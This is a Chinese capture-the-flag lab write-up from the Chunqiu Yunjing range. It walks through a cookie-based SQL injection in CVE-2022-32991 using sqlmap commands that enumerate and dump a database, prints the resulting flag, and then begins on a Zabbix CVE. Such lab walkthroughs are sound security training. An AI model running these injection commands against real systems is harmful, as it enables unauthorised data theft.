春秋云镜靶场系列1

春秋云镜靶场系列

春秋云境.com是永信至诚基于多年来在网络靶场领域的深厚技术及场景积累，以春秋云底层能力为基础，以平行仿真技术为支撑，以高仿真内容场景为核心，打造网络安全实战“元宇宙”，通过更加多元、开放、创新的线上技术交流空间，广泛支撑个人、企业、学校、科研院所等各类社会群体和组织在线进行网络安全学习、能力认证、漏洞研究、综合渗透、案例复现、竞赛演练等。

平台设计了漏洞靶标和仿真场景两大体系，为用户提供实战化、体系化的渗透测试体验。其中，漏洞靶标多为历史CVE漏洞以及国内热点漏洞，涵盖浏览器、数据库、网络设备、Web等方向，用户可以根据自身培训、验证等需求，实时复现漏洞场景；仿真场景均源于真实网络安全案件、大型攻防演练等实战场景，具备独特剧情及技术点，仿真度高、实战性强、技术内容深，饕餮技术盛宴系统化淬炼网络安全实战思维。值得一提的是，这些专业靶场场景均由霄壤实验室、一线实战专家及国内TOP CTF战队高手设计制作，可满足各阶段爱好者的学习需求，为更广泛的用户群体提供更轻量的靶场体验，助力攻防两端的实战技能提升

靶场地址 https://yunjing.ichunqiu.com/

第一章. CVE-2022-32991（Web Based Quiz System SQL注入）

1.1. 靶标介绍：

该CMS的welcome.php中存在SQL注入攻击

1.2. 靶场复现

进入靶场发现登录页面尝试注册登录

登录后随便选择一个选项进入

当然是128了。不过我们不是来做题的。

根据题目提醒SQL注入的注入点在edi参数，需要F12使用cookie注入。

PHPSESSID=1nblg0fthd76cbfe7n04mhjift

接下来就是老规矩拿到SQLMAP中进行注入，获取数据库以及flag。

sqlmap -u "" --cookie="" --dbs --random-agent -p eid --batch

---

-u url

--dbs 获取数据库

--cookie 指定cookie信息

--random-agent 随机UserAgent

-p 指定参数

--batch 全自动默认注入

获取数据表

sqlmap -u "" --cookie="" -D ctf --tables --random-agent -p eid –batch

获取数据列名

这flag不就出来了吗？

sqlmap -u "" --cookie="" -D ctf -T flag -C flag --dump --random-agent -p eid –batch

flag{c0d1678d-d095-4308-8eef-c2bffd493de5}

第二章. CVE-2022-23134

2.1. 靶标介绍：

Zabbix Sia Zabbix是拉脱维亚Zabbix SIA（Zabbix Sia）公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix 存在安全漏洞，该漏洞源于在初始设置过程之后，setup.php 文件的某些步骤不仅可以由超级管理员访问，也可以由未经身份验证的用户访问。